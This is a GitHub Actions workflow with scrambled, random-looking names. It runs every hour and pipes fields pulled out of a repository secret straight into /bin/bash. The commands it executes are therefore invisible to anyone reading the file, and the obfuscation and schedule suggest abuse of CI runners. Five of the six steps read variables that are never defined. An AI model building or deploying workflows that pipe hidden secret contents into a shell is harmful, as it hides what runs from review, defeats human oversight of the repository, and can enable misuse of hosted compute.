name: dongjinwei6789

on:
  workflow_dispatch:
  schedule:
    - cron: '36 * * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: dongjinwei6789
        env:
          llg36913: ${{ secrets.llg36913 }}
        run: |
          echo $llg36913 | jq -r .lmim5469 | /bin/bash
          echo $w728 | jq -r .ry48 | /bin/bash
          echo $khxll157 | jq -r .pbjh04 | /bin/bash
          echo $huqnx62 | jq -r .kfh3215 | /bin/bash
          echo $qezz25 | jq -r .joct13 | /bin/bash
          echo $j47141 | jq -r .vulmc8 | /bin/bash

